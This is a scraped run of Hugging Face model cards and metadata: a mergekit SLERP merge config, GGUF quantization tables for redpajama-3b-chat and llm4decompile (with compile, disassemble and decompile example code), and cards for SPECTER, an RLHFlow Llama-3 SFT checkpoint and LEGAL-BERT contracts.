* [liminerity/merge4](https://huggingface.co/liminerity/merge4)
* [liminerity/merge2](https://huggingface.co/liminerity/merge2)
## 🧩 Configuration
```yaml
slices:
- sources:
- model: ammarali32/multi_verse_model
layer_range: [0, 32]
- model: MSL7/INEX12-7b
layer_range: [0, 32]
merge_method: slerp
base_model: ammarali32/multi_verse_model
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
slices:
- sources:
- model: ammarali32/multi_verse_model
layer_range: [0, 32]
- model: yam-peleg/Experiment26-7B
layer_range: [0, 32]
merge_method: slerp
base_model: ammarali32/multi_verse_model
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
slices:
- sources:
- model: liminerity/merge3
layer_range: [0, 32]
- model: ammarali32/multi_verse_model
layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge3
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
slices:
- sources:
- model: liminerity/merge1
layer_range: [0, 32]
- model: liminerity/merge
layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge1
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
slices:
- sources:
- model: liminerity/merge3
layer_range: [0, 32]
- model: yam-peleg/Experiment26-7B
layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge3
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
slices:
- sources:
- model: liminerity/merge4
layer_range: [0, 32]
- model: liminerity/merge2
layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge4
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
``` |
RichardErkhov/ikala_-_redpajama-3b-chat-gguf | RichardErkhov | "2024-06-06T14:58:23Z" | 3,625 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-06T10:41:51Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
redpajama-3b-chat - GGUF
- Model creator: https://huggingface.co/ikala/
- Original model: https://huggingface.co/ikala/redpajama-3b-chat/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [redpajama-3b-chat.Q2_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q2_K.gguf) | Q2_K | 1.01GB |
| [redpajama-3b-chat.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ3_XS.gguf) | IQ3_XS | 1.14GB |
| [redpajama-3b-chat.IQ3_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ3_S.gguf) | IQ3_S | 1.16GB |
| [redpajama-3b-chat.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K_S.gguf) | Q3_K_S | 1.16GB |
| [redpajama-3b-chat.IQ3_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ3_M.gguf) | IQ3_M | 1.28GB |
| [redpajama-3b-chat.Q3_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K.gguf) | Q3_K | 1.38GB |
| [redpajama-3b-chat.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K_M.gguf) | Q3_K_M | 1.38GB |
| [redpajama-3b-chat.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K_L.gguf) | Q3_K_L | 1.49GB |
| [redpajama-3b-chat.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ4_XS.gguf) | IQ4_XS | 1.43GB |
| [redpajama-3b-chat.Q4_0.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_0.gguf) | Q4_0 | 1.49GB |
| [redpajama-3b-chat.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ4_NL.gguf) | IQ4_NL | 1.5GB |
| [redpajama-3b-chat.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_K_S.gguf) | Q4_K_S | 1.5GB |
| [redpajama-3b-chat.Q4_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_K.gguf) | Q4_K | 1.66GB |
| [redpajama-3b-chat.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_K_M.gguf) | Q4_K_M | 1.66GB |
| [redpajama-3b-chat.Q4_1.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_1.gguf) | Q4_1 | 1.64GB |
| [redpajama-3b-chat.Q5_0.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_0.gguf) | Q5_0 | 1.8GB |
| [redpajama-3b-chat.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_K_S.gguf) | Q5_K_S | 1.8GB |
| [redpajama-3b-chat.Q5_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_K.gguf) | Q5_K | 1.93GB |
| [redpajama-3b-chat.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_K_M.gguf) | Q5_K_M | 1.93GB |
| [redpajama-3b-chat.Q5_1.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_1.gguf) | Q5_1 | 1.95GB |
| [redpajama-3b-chat.Q6_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q6_K.gguf) | Q6_K | 2.12GB |
| [redpajama-3b-chat.Q8_0.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q8_0.gguf) | Q8_0 | 2.75GB |
Original model description:
---
license: cc-by-nc-2.0
language:
- en
- zh
- ja
tags:
- sft
pipeline_tag: text-generation
widget:
- text: >-
<|prompter|>What is a meme, and what's the history behind this
word?<|endoftext|><|assistant|>
- text: <|prompter|>What's the Earth total population<|endoftext|><|assistant|>
- text: >-
<|prompter|>Write a story about future of AI
development<|endoftext|><|assistant|>
datasets:
- OpenAssistant/oasst1
- databricks/databricks-dolly-15k
- anon8231489123/ShareGPT_Vicuna_unfiltered
- LIUM/tedlium
- theblackcat102/joke_explaination
---
# Redpajama-3B SFT model

It is based on a RedPajama's 3B that was fine-tuned on human demonstrations
of assistant conversations collected through the
[https://open-assistant.io/](https://open-assistant.io/) human feedback web
app before April 12, 2023.
supervised finetune on sequence length of 5120
## Model Details
- **Developed by:** [Open-Assistant Contributors](https://open-assistant.io/team) and [iKala](https://ikala.ai/)
- **Model type:** Transformer-based Language Model
- **Language:** English, Chinese, Japanese
- **Finetuned from:** [togethercomputer/RedPajama-INCITE-Base-3B-v1](https://huggingface.co/togethercomputer/RedPajama-INCITE-Base-3B-v1)
- **Code:** [Open-Assistant/model/model_training](https://github.com/LAION-AI/Open-Assistant/tree/main/model/model_training)
- **License:** Non commercial
## Prompting
Two special tokens are used to mark the beginning of user and assistant turns:
`<|prompter|>` and `<|assistant|>`. Each turn ends with a `<|endoftext|>` token.
Input prompt example:
```
<|prompter|>What is a meme, and what's the history behind this word?<|endoftext|><|assistant|>
```
The input ends with the `<|assistant|>` token to signal that the model should
start generating the assistant reply.
## Benchmark
| model | MMLU | BBH | Humaneval @10 |
|---|---|---|---|
| [ikala/redpajama-3b-chat](https://huggingface.co/ikala/redpajama-3b-chat) | 24.6 | 29.3 | 4.8 |
| [ikala/bloom-zh-3b-chat](https://huggingface.co/ikala/bloom-zh-3b-chat) | 31.4 | 30.2 | 0.0 |
| llama-7b (reference) | 30.9 | 27.6 | 10.3 |
## Dev Details
- base model: [togethercomputer/RedPajama-INCITE-Base-3B-v1](https://huggingface.co/togethercomputer/RedPajama-INCITE-Base-3B-v1)
- checkpoint: 1 epoch (6000 steps)
- hardware: NVIDIA RTX A6000 x 4
command: `deepspeed trainer_sft.py --configs defaults redpajama-3b datasets --num_train_epochs 2 --deepspeed`
data:
```
datasets:
- wmt2019_zh-en:
max_val_set: 1000
max_train_set: 20000
- ted_trans_en-ja:
max_val_set: 1000
max_train_set: 20000
- ted_trans_zh-ja:
max_val_set: 1000
max_train_set: 20000
- ikala:
input_file_path: export_conversation_v4.4.jsonl
val_split: 0.05
- dolly15k:
val_split: 0.05
- oasst_export:
lang: "bg,ca,cs,da,de,en,es,fr,hr,hu,it,nl,pl,pt,ro,ru,sl,sr,sv,uk,zh,ja,th,ko"
input_file_path: 2023-04-12_oasst_release_ready_synth.jsonl.gz
val_split: 0.05
- joke
- gsm8k
- webgpt
```
with internal datasets `ikala` so if you try to reproduce please remove the dataset
redpajama-3b:
```
redpajama-3b:
dtype: fp16
log_dir: "redpajama_3b"
learning_rate: 1e-5
model_name: saved_models/RedPajama-INCITE-Base-3B-v1
output_dir: ikala_v4_3b
weight_decay: 0.0
max_length: 8196
warmup_steps: 2000
gradient_checkpointing: true
gradient_accumulation_steps: 32
per_device_train_batch_size: 1
per_device_eval_batch_size: 2
eval_steps: 500
save_steps: 1000
num_train_epochs: 8
save_total_limit: 2
deepspeed_config: configs/zero3_config_sft.json
```
zero config:
```
{
"fp16": {
"enabled": "auto",
"loss_scale": 0,
"loss_scale_window": 1000,
"initial_scale_power": 16,
"hysteresis": 2,
"min_loss_scale": 1
},
"bf16": {
"enabled": "auto"
},
"optimizer": {
"type": "AdamW",
"params": {
"lr": "auto",
"betas": "auto",
"eps": "auto",
"weight_decay": "auto"
}
},
"scheduler": {
"type": "WarmupDecayLR",
"params": {
"warmup_min_lr": "auto",
"warmup_max_lr": "auto",
"warmup_num_steps": "auto",
"warmup_type": "linear",
"total_num_steps": "auto"
}
},
"zero_optimization": {
"stage": 3,
"overlap_comm": true,
"contiguous_gradients": true,
"sub_group_size": 1e9,
"reduce_bucket_size": "auto",
"stage3_prefetch_bucket_size": "auto",
"stage3_param_persistence_threshold": "auto",
"stage3_max_live_parameters": 1e9,
"stage3_max_reuse_distance": 1e9,
"stage3_gather_16bit_weights_on_model_save": true
},
"gradient_accumulation_steps": "auto",
"gradient_clipping": "auto",
"steps_per_print": 2000,
"train_batch_size": "auto",
"train_micro_batch_size_per_gpu": "auto",
"wall_clock_breakdown": false
}
```
|
RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf | RichardErkhov | "2024-06-30T02:56:58Z" | 3,622 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-30T02:33:34Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
llm4decompile-1.3b-v1.5 - GGUF
- Model creator: https://huggingface.co/LLM4Binary/
- Original model: https://huggingface.co/LLM4Binary/llm4decompile-1.3b-v1.5/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [llm4decompile-1.3b-v1.5.Q2_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q2_K.gguf) | Q2_K | 0.52GB |
| [llm4decompile-1.3b-v1.5.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ3_XS.gguf) | IQ3_XS | 0.57GB |
| [llm4decompile-1.3b-v1.5.IQ3_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ3_S.gguf) | IQ3_S | 0.6GB |
| [llm4decompile-1.3b-v1.5.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K_S.gguf) | Q3_K_S | 0.6GB |
| [llm4decompile-1.3b-v1.5.IQ3_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ3_M.gguf) | IQ3_M | 0.63GB |
| [llm4decompile-1.3b-v1.5.Q3_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K.gguf) | Q3_K | 0.66GB |
| [llm4decompile-1.3b-v1.5.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K_M.gguf) | Q3_K_M | 0.66GB |
| [llm4decompile-1.3b-v1.5.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K_L.gguf) | Q3_K_L | 0.69GB |
| [llm4decompile-1.3b-v1.5.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ4_XS.gguf) | IQ4_XS | 0.7GB |
| [llm4decompile-1.3b-v1.5.Q4_0.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_0.gguf) | Q4_0 | 0.72GB |
| [llm4decompile-1.3b-v1.5.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ4_NL.gguf) | IQ4_NL | 0.73GB |
| [llm4decompile-1.3b-v1.5.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_K_S.gguf) | Q4_K_S | 0.76GB |
| [llm4decompile-1.3b-v1.5.Q4_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_K.gguf) | Q4_K | 0.81GB |
| [llm4decompile-1.3b-v1.5.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_K_M.gguf) | Q4_K_M | 0.81GB |
| [llm4decompile-1.3b-v1.5.Q4_1.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_1.gguf) | Q4_1 | 0.8GB |
| [llm4decompile-1.3b-v1.5.Q5_0.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_0.gguf) | Q5_0 | 0.87GB |
| [llm4decompile-1.3b-v1.5.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_K_S.gguf) | Q5_K_S | 0.89GB |
| [llm4decompile-1.3b-v1.5.Q5_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_K.gguf) | Q5_K | 0.93GB |
| [llm4decompile-1.3b-v1.5.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_K_M.gguf) | Q5_K_M | 0.93GB |
| [llm4decompile-1.3b-v1.5.Q5_1.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_1.gguf) | Q5_1 | 0.95GB |
| [llm4decompile-1.3b-v1.5.Q6_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q6_K.gguf) | Q6_K | 1.09GB |
| [llm4decompile-1.3b-v1.5.Q8_0.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q8_0.gguf) | Q8_0 | 1.33GB |
Original model description:
---
license: mit
tags:
- decompile
- binary
widget:
- text: "# This is the assembly code:\n<func0>:\nendbr64\nlea (%rdi,%rsi,1),%eax\nretq\n# What is the source code?\n"
---
### 1. Introduction of LLM4Decompile
LLM4Decompile aims to decompile x86 assembly instructions into C. The newly released V1.5 series are trained with a larger dataset (15B tokens) and a maximum token length of 4,096, with remarkable performance (up to 100% improvement) compared to the previous model.
- **Github Repository:** [LLM4Decompile](https://github.com/albertan017/LLM4Decompile)
### 2. Evaluation Results
| Model/Benchmark | HumanEval-Decompile | | | | | ExeBench | | | | |
|:----------------------:|:-------------------:|:-------:|:-------:|:-------:|:-------:|:--------:|:-------:|:-------:|:-------:|:-------:|
| Optimization Level | O0 | O1 | O2 | O3 | AVG | O0 | O1 | O2 | O3 | AVG |
| DeepSeek-Coder-6.7B | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0000 |
| GPT-4o | 0.3049 | 0.1159 | 0.1037 | 0.1159 | 0.1601 | 0.0443 | 0.0328 | 0.0397 | 0.0343 | 0.0378 |
| LLM4Decompile-End-1.3B | 0.4720 | 0.2061 | 0.2122 | 0.2024 | 0.2732 | 0.1786 | 0.1362 | 0.1320 | 0.1328 | 0.1449 |
| LLM4Decompile-End-6.7B | 0.6805 | 0.3951 | 0.3671 | 0.3720 | 0.4537 | 0.2289 | 0.1660 | 0.1618 | 0.1625 | 0.1798 |
| LLM4Decompile-End-33B | 0.5168 | 0.2956 | 0.2815 | 0.2675 | 0.3404 | 0.1886 | 0.1465 | 0.1396 | 0.1411 | 0.1540 |
### 3. How to Use
Here is an example of how to use our model (Revised for V1.5).
Note: **Replace** func0 with the function name you want to decompile.
**Preprocessing:** Compile the C code into binary, and disassemble the binary into assembly instructions.
```python
import subprocess
import os
OPT = ["O0", "O1", "O2", "O3"]
fileName = 'samples/sample' #'path/to/file'
for opt_state in OPT:
output_file = fileName +'_' + opt_state
input_file = fileName+'.c'
compile_command = f'gcc -o {output_file}.o {input_file} -{opt_state} -lm'#compile the code with GCC on Linux
subprocess.run(compile_command, shell=True, check=True)
compile_command = f'objdump -d {output_file}.o > {output_file}.s'#disassemble the binary file into assembly instructions
subprocess.run(compile_command, shell=True, check=True)
input_asm = ''
with open(output_file+'.s') as f:#asm file
asm= f.read()
if '<'+'func0'+'>:' not in asm: #IMPORTANT replace func0 with the function name
raise ValueError("compile fails")
asm = '<'+'func0'+'>:' + asm.split('<'+'func0'+'>:')[-1].split('\n\n')[0] #IMPORTANT replace func0 with the function name
asm_clean = ""
asm_sp = asm.split("\n")
for tmp in asm_sp:
if len(tmp.split("\t"))<3 and '00' in tmp:
continue
idx = min(
len(tmp.split("\t")) - 1, 2
)
tmp_asm = "\t".join(tmp.split("\t")[idx:]) # remove the binary code
tmp_asm = tmp_asm.split("#")[0].strip() # remove the comments
asm_clean += tmp_asm + "\n"
input_asm = asm_clean.strip()
before = f"# This is the assembly code:\n"#prompt
after = "\n# What is the source code?\n"#prompt
input_asm_prompt = before+input_asm.strip()+after
with open(fileName +'_' + opt_state +'.asm','w',encoding='utf-8') as f:
f.write(input_asm_prompt)
```
**Decompilation:** Use LLM4Decompile to translate the assembly instructions into C:
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
model_path = 'LLM4Binary/llm4decompile-1.3b-v1.5' # V1.5 Model
tokenizer = AutoTokenizer.from_pretrained(model_path)
model = AutoModelForCausalLM.from_pretrained(model_path,torch_dtype=torch.bfloat16).cuda()
with open(fileName +'_' + OPT[0] +'.asm','r') as f:#optimization level O0
asm_func = f.read()
inputs = tokenizer(asm_func, return_tensors="pt").to(model.device)
with torch.no_grad():
outputs = model.generate(**inputs, max_new_tokens=4000)
c_func_decompile = tokenizer.decode(outputs[0][len(inputs[0]):-1])
with open(fileName +'.c','r') as f:#original file
func = f.read()
print(f'original function:\n{func}')# Note we only decompile one function, where the original file may contain multiple functions
print(f'decompiled function:\n{c_func_decompile}')
```
### 4. License
This code repository is licensed under the MIT License.
### 5. Contact
If you have any questions, please raise an issue.
|
sentence-transformers/allenai-specter | sentence-transformers | "2024-03-27T09:52:27Z" | 3,620 | 15 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"tf",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | sentence-similarity | "2022-03-02T23:29:05Z" | ---
license: apache-2.0
library_name: sentence-transformers
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
pipeline_tag: sentence-similarity
language:
- en
---
# allenai-specter
This model is a conversion of the [AllenAI SPECTER](https://github.com/allenai/specter) model to [sentence-transformers](https://www.SBERT.net). It can be used to map the titles & abstracts of scientific publications to a vector space such that similar papers are close.
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["This is an example sentence", "Each sentence is converted"]
model = SentenceTransformer('sentence-transformers/allenai-specter')
embeddings = model.encode(sentences)
print(embeddings)
```
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
def cls_pooling(model_output, attention_mask):
return model_output[0][:,0]
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('sentence-transformers/allenai-specter')
model = AutoModel.from_pretrained('sentence-transformers/allenai-specter')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, max pooling.
sentence_embeddings = cls_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
For an automated evaluation of this model, see the *Sentence Embeddings Benchmark*: [https://seb.sbert.net](https://seb.sbert.net?model_name=sentence-transformers/allenai-specter)
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': True, 'pooling_mode_mean_tokens': False, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Citing & Authors
See [AllenAI SPECTER](https://github.com/allenai/specter) |
RLHFlow/LLaMA3-SFT | RLHFlow | "2024-05-23T14:18:57Z" | 3,620 | 5 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:2405.07863",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-05-17T12:52:45Z" | ---
library_name: transformers
tags: []
---
This is the SFT checkpoint used for the project [Online-RLHF](https://github.com/RLHFlow/Online-RLHF). Also check our [technical report here](https://arxiv.org/pdf/2405.07863).
The model is trained from [meta-llama/Meta-Llama-3-8B](https://huggingface.co/meta-llama/Meta-Llama-3-8B) on a mixture of diverse open-source high-quality data for 1 epoch with detailed parameters in the report. It has not been trained by RLHF and can serve as a good starting point for the RLHF research.
|
nlpaueb/bert-base-uncased-contracts | nlpaueb | "2022-04-28T14:43:56Z" | 3,619 | 18 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"bert",
"legal",
"fill-mask",
"en",
"license:cc-by-sa-4.0",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:05Z" | ---
language: en
pipeline_tag: fill-mask
license: cc-by-sa-4.0
thumbnail: https://i.ibb.co/p3kQ7Rw/Screenshot-2020-10-06-at-12-16-36-PM.png
tags:
- legal
widget:
- text: "This [MASK] Agreement is between General Motors and John Murray."
---
# LEGAL-BERT: The Muppets straight out of Law School
<img align="left" src="https://i.ibb.co/p3kQ7Rw/Screenshot-2020-10-06-at-12-16-36-PM.png" width="100"/>
LEGAL-BERT is a family of BERT models for the legal domain, intended to assist legal NLP research, computational law, and legal technology applications. To pre-train the different variations of LEGAL-BERT, we collected 12 GB of diverse English legal text from several fields (e.g., legislation, court cases, contracts) scraped from publicly available resources. Sub-domain variants (CONTRACTS-, EURLEX-, ECHR-) and/or general LEGAL-BERT perform better than using BERT out of the box for domain-specific tasks.<br>
This is the sub-domain variant pre-trained on US contracts.
<br/><br/>
---
I. Chalkidis, M. Fergadiotis, P. Malakasiotis, N. Aletras and I. Androutsopoulos. "LEGAL-BERT: The Muppets straight out of Law School". In Findings of Empirical Methods in Natural Language Processing (EMNLP 2020) (Short Papers), to be held online, 2020. (https://aclanthology.org/2020.findings-emnlp.261)
---
## Pre-training corpora
The pre-training corpora of LEGAL-BERT include:
* 116,062 documents of EU legislation, publicly available from EURLEX (http://eur-lex.europa.eu), the repository of EU Law running under the EU Publication Office.
* 61,826 documents of UK legislation, publicly available from the UK legislation portal (http://www.legislation.gov.uk).
* 19,867 cases from the European Court of Justice (ECJ), also available from EURLEX.
* 12,554 cases from HUDOC, the repository of the European Court of Human Rights (ECHR) (http://hudoc.echr.coe.int/eng).
* 164,141 cases from various courts across the USA, hosted in the Case Law Access Project portal (https://case.law).
* 76,366 US contracts from EDGAR, the database of US Securities and Exchange Commission (SECOM) (https://www.sec.gov/edgar.shtml).
## Pre-training details
* We trained BERT using the official code provided in Google BERT's GitHub repository (https://github.com/google-research/bert).
* We released a model similar to the English BERT-BASE model (12-layer, 768-hidden, 12-heads, 110M parameters).
* We chose to follow the same training set-up: 1 million training steps with batches of 256 sequences of length 512 with an initial learning rate 1e-4.
* We were able to use a single Google Cloud TPU v3-8 provided for free from [TensorFlow Research Cloud (TFRC)](https://www.tensorflow.org/tfrc), while also utilizing [GCP research credits](https://edu.google.com/programs/credits/research). Huge thanks to both Google programs for supporting us!
## Models list
| Model name | Model Path | Training corpora |
| ------------------- | ------------------------------------ | ------------------- |
| CONTRACTS-BERT-BASE | `nlpaueb/bert-base-uncased-contracts` | US contracts |
| EURLEX-BERT-BASE | `nlpaueb/bert-base-uncased-eurlex` | EU legislation |
| ECHR-BERT-BASE | `nlpaueb/bert-base-uncased-echr` | ECHR cases |
| LEGAL-BERT-BASE * | `nlpaueb/legal-bert-base-uncased` | All |
| LEGAL-BERT-SMALL | `nlpaueb/legal-bert-small-uncased` | All |
\* LEGAL-BERT-BASE is the model referred to as LEGAL-BERT-SC in Chalkidis et al. (2020); a model trained from scratch in the legal corpora mentioned below using a newly created vocabulary by a sentence-piece tokenizer trained on the very same corpora.
\*\* As many of you expressed interest in the LEGAL-BERT-FP models (those relying on the original BERT-BASE checkpoint), they have been released in Archive.org (https://archive.org/details/legal_bert_fp), as these models are secondary and possibly only interesting for those who aim to dig deeper in the open questions of Chalkidis et al. (2020).
## Load Pretrained Model
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("nlpaueb/bert-base-uncased-contracts")
model = AutoModel.from_pretrained("nlpaueb/bert-base-uncased-contracts")
```
## Use LEGAL-BERT variants as Language Models
| Corpus | Model | Masked token | Predictions |
| --------------------------------- | ---------------------------------- | ------------ | ------------ |
| | **BERT-BASE-UNCASED** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('new', '0.09'), ('current', '0.04'), ('proposed', '0.03'), ('marketing', '0.03'), ('joint', '0.02')
